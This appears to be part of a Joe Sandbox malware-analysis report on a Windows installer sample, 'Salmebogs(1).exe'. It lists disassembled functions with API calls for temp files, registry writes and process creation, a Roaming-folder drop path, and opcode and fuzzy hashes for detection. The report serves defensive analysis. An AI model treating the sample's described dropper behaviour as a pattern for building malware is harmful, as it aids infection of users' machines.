                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 577 403027-40303e 578 403040 577->578 579 403047-403050 577->579 578->579 580 403052 579->580 581 403059-40305e 579->581 580->581 582 403060-403069 call 403235 581->582 583 40306e-40307b call 40321f 581->583 582->583 587 403081-403085 583->587 588 40320d 583->588 589 4031b8-4031ba 587->589 590 40308b-4030b1 GetTickCount 587->590 591 40320f-403210 588->591 592 4031fa-4031fd 589->592 593 4031bc-4031bf 589->593 594 403215 590->594 595 4030b7-4030bf 590->595 596 403218-40321c 591->596 597 403202-40320b call 40321f 592->597 598 4031ff 592->598 593->594 599 4031c1 593->599 594->596 600 4030c1 595->600 601 4030c4-4030d2 call 40321f 595->601 597->588 609 403212 597->609 598->597 603 4031c4-4031ca 599->603 600->601 601->588 611 4030d8-4030e1 601->611 606 4031cc 603->606 607 4031ce-4031dc call 40321f 603->607 606->607 607->588 614 4031de-4031ea call 405cb4 607->614 609->594 613 4030e7-403107 call 406526 611->613 618 4031b0-4031b2 613->618 619 40310d-403120 GetTickCount 613->619 623 4031b4-4031b6 614->623 624 4031ec-4031f6 614->624 618->591 621 403122-40312a 619->621 622 40316b-40316d 619->622 626 403132-403163 MulDiv wsprintfW call 40518c 621->626 627 40312c-403130 621->627 628 4031a4-4031a8 622->628 629 40316f-403173 622->629 623->591 624->603 625 4031f8 624->625 625->594 634 403168 626->634 627->622 627->626 628->595 630 4031ae 628->630 632 403175-40317c call 405cb4 629->632 633 40318a-403195 629->633 630->594 637 403181-403183 632->637 636 403198-40319c 633->636 634->622 636->613 638 4031a2 636->638 637->623 639 403185-403188 637->639 638->594 639->636
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
                                                                        • String ID: ... %d%%
                                                                        • API String ID: 551687249-2449383134
                                                                        • Opcode ID: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
                                                                        • Instruction ID: 45afdf0c92a303c1fb6294b6805c2526d8a52aadf0d65962a881b974f50d995b
                                                                        • Opcode Fuzzy Hash: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
                                                                        • Instruction Fuzzy Hash: AA518C31801209EBCB10CFA5DA44B9F7BB8AF55766F1441BBE814B72C1D7788F508BA9
                                                                        Function 00405C31 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 640 405c31-405c3d 641 405c3e-405c72 GetTickCount GetTempFileNameW 640->641 642 405c81-405c83 641->642 643 405c74-405c76 641->643 645 405c7b-405c7e 642->645 643->641 644 405c78 643->644 644->645
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405C4F
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",0040327B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00405C6A
                                                                        Strings
                                                                        • "C:\Users\user\Desktop\Salmebogs(1).exe", xrefs: 00405C31
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C36
                                                                        • nsa, xrefs: 00405C3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-538229093
                                                                        • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                        • Instruction ID: eddd0f9b3fe3e6878938fd53c549b869409703644024dbd16f9d2af4fdafb47c
                                                                        • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                        • Instruction Fuzzy Hash: D7F09076700708BFEB109F59DD05A9BB7BCEB91710F10403AFD01E7280E6B09E548B68
                                                                        Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 646 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 653 4023c7-4023cf 646->653 654 402a4c-402a5b 646->654 656 4023d1-4023de call 402bbf lstrlenW 653->656 657 4023e2-4023e5 653->657 656->657 658 4023f5-4023f8 657->658 659 4023e7-4023f4 call 402ba2 657->659 664 402409-40241d RegSetValueExW 658->664 665 4023fa-402404 call 403027 658->665 659->658 668 402422-4024fc RegCloseKey 664->668 669 40241f 664->669 665->664 668->654 669->668
                                                                        APIs
                                                                        • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                        • lstrlenW.KERNEL32(0040B5A8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040B5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateValuelstrlen
                                                                        • String ID:
                                                                        • API String ID: 1356686001-0
                                                                        • Opcode ID: 9ef4235b4922e360298e28561e4c1430fa93c9f577f30df76f60a0902072e9d4
                                                                        • Instruction ID: 2eb3f179888eee6661223950110f5cf3924aaf9325c93c271646fcdba77cb0fe
                                                                        • Opcode Fuzzy Hash: 9ef4235b4922e360298e28561e4c1430fa93c9f577f30df76f60a0902072e9d4
                                                                        • Instruction Fuzzy Hash: 1411AE71E00108BFEB10AFA1DE89EAF767CEB44358F11403AF904B61D1DAB85E409768
                                                                        Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 671 401e66-401e77 call 402bbf call 40518c call 40570d 677 401e7c-401e81 671->677 678 401e87-401e8a 677->678 679 40281e-402825 677->679 681 401edb-401ee4 CloseHandle 678->681 682 401e8c-401e9c WaitForSingleObject 678->682 680 402a4c-402a5b 679->680 681->680 683 401eac-401eae 682->683 685 401eb0-401ec0 GetExitCodeProcess 683->685 686 401e9e-401eaa call 406443 WaitForSingleObject 683->686 689 401ec2-401ecd call 405f74 685->689 690 401ecf-401ed2 685->690 686->683 689->681 690->681 691 401ed4 690->691 691->681
                                                                        APIs
                                                                          • Part of subcall function 0040518C: lstrlenW.KERNEL32(Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C4
                                                                          • Part of subcall function 0040518C: lstrlenW.KERNEL32(00403168,Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D4
                                                                          • Part of subcall function 0040518C: lstrcatW.KERNEL32(Completed,00403168,00403168,Completed,00000000,007953FF,762323A0), ref: 004051E7
                                                                          • Part of subcall function 0040518C: SetWindowTextW.USER32(Completed,Completed), ref: 004051F9
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040521F
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405239
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405247
                                                                          • Part of subcall function 0040570D: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 00405736
                                                                          • Part of subcall function 0040570D: CloseHandle.KERNEL32(?), ref: 00405743
                                                                        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 3585118688-0
                                                                        • Opcode ID: 4182218c851202a58554ce867b4190771bb8efdca3d2f608ac5fa283ef4d2969
                                                                        • Instruction ID: 0d84b1aa03f1a7237eec4328a6cc722d91751d385b027cc4a264b2ba126eb04a
                                                                        • Opcode Fuzzy Hash: 4182218c851202a58554ce867b4190771bb8efdca3d2f608ac5fa283ef4d2969
                                                                        • Instruction Fuzzy Hash: 2B116131900508EBCF21AF91CD4599E7AB6EF40354F20403BF905BA1E1D7798A929B9D
                                                                        Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 695 4015b9-4015cd call 402bbf call 405a8c 700 401629-40162c 695->700 701 4015cf-4015e2 call 405a0e 695->701 703 40165b-4021e1 call 401423 700->703 704 40162e-40164d call 401423 call 40602d SetCurrentDirectoryW 700->704 708 4015e4-4015e7 701->708 709 4015fc-4015ff call 4056d8 701->709 718 402a4c-402a5b 703->718 719 40281e-402825 703->719 704->718 722 401653-401656 704->722 708->709 712 4015e9-4015f0 call 4056f5 708->712 720 401604-401606 709->720 712->709 726 4015f2-4015fa call 40565b 712->726 719->718 723 401608-40160d 720->723 724 40161f-401627 720->724 722->718 727 40161c 723->727 728 40160f-40161a GetFileAttributesW 723->728 724->700 724->701 726->720 727->724 728->724 728->727
                                                                        APIs
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(?,?,007A4728,?,00405B00,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A9A
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405A9F
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405AB7
                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                          • Part of subcall function 0040565B: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040569E
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,?,00000000,000000F0), ref: 00401645
                                                                        Strings
                                                                        • C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede, xrefs: 00401638
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                        • String ID: C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede
                                                                        • API String ID: 1892508949-246221564
                                                                        • Opcode ID: d484a4ad1a9cf03a8d5b4845f460ea4f9df8045de8ff8018071d72647c5c6f44
                                                                        • Instruction ID: c84cbb424bb3084f93bd215551d43dceb81b994fc0f34687c4e9f979fa86e455
                                                                        • Opcode Fuzzy Hash: d484a4ad1a9cf03a8d5b4845f460ea4f9df8045de8ff8018071d72647c5c6f44
                                                                        • Instruction Fuzzy Hash: D711E631500504ABCF207FA4CD0099F3AA1EF54364B24093BFA06B61F1DA3D8E819E5D
                                                                        Function 0040570D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 732 40570d-40573e CreateProcessW 733 405740-405749 CloseHandle 732->733 734 40574c-40574d 732->734 733->734
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 00405736
                                                                        • CloseHandle.KERNEL32(?), ref: 00405743
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405720
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
                                                                        • Instruction ID: 36cb6700757ba35c499a420c30df9f69cdbb022eeaef0abc6502029d7df0636c
                                                                        • Opcode Fuzzy Hash: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
                                                                        • Instruction Fuzzy Hash: 2DE0B6F4600209BFEB10AB64ED49E7B7AACEB48605F018525BD50F2190D7B998148A78
                                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
                                                                        • Instruction ID: 1204d1a220e6d768f3d461a9159a4fc95a2ffbde449ffc0b80a50a9695adc5d2
                                                                        • Opcode Fuzzy Hash: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
                                                                        • Instruction Fuzzy Hash: 4E01D132624210ABE7095B389D04B6A3698E751315F10CA3BB851F66F1DA7C8C428B4C
                                                                        Function 0040525F Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 0040526F
                                                                          • Part of subcall function 0040413D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
                                                                        • CoUninitialize.COMBASE(00000404,00000000), ref: 004052BB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: InitializeMessageSendUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2896919175-0
                                                                        • Opcode ID: d4a5eda30783c5f32a6eef6d3db55172bfb61ae871ec4e49a63d24e9d9f7b7cc
                                                                        • Instruction ID: 07fe8937bb0382fb0b6d536153df17722968a955825c4abcd3168338cebd822e
                                                                        • Opcode Fuzzy Hash: d4a5eda30783c5f32a6eef6d3db55172bfb61ae871ec4e49a63d24e9d9f7b7cc
                                                                        • Instruction Fuzzy Hash: 17F0FA73400A009BE7811754AE05B27B3A4EFD1309F04C07FEE88B62A0CA7C4840CF5E
                                                                        Function 00406407 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
